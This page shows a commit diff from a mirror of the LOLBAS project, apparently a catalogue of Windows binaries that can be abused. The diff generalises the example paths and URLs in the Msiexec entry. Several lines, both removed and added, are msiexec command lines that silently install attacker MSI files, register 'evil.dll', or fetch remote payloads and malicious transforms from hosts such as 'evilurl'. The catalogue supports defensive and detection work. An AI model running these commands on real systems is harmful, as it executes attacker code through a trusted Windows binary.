public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 12:42:19 +02:00
Code Issues Projects Releases Wiki Activity

Generalising file paths and urls, see #10 (#422)

Browse Source
This commit is contained in:
Wietze
2025-01-28 11:15:01 +00:00
committed by GitHub
parent e62749f81a
commit a79893e7ad
196 changed files with 555 additions and 758 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
yml/OSBinaries/Msiexec.yml
View File

@@ -1,10 +1,10 @@
---
Name: Msiexec.exe
Description: Used by Windows to execute msi files
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: msiexec /quiet /i cmd.msi
- Command: msiexec /quiet /i {PATH:.msi}
Description: Installs the target .MSI file silently.
Usecase: Execute custom made msi file with attack code
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
- Command: msiexec /q /i {REMOTEURL}
Description: Installs the target remote & renamed .MSI file silently.
Usecase: Execute custom made msi file with attack code from remote server
Category: Execute
@@ -23,7 +23,7 @@ Commands:
Tags:
- Execute: MSI
- Execute: Remote
- Command: msiexec /y "C:\folder\evil.dll"
- Command: msiexec /y {PATH_ABSOLUTE:.dll}
Description: Calls DllRegisterServer to register the target DLL.
Usecase: Execute dll files
Category: Execute
@@ -33,7 +33,7 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Command: msiexec /z "C:\folder\evil.dll"
- Command: msiexec /z {PATH_ABSOLUTE:.dll}
Description: Calls DllUnregisterServer to un-register the target DLL.
Usecase: Execute dll files
Category: Execute
@@ -43,7 +43,7 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
- Command: msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
Category: Execute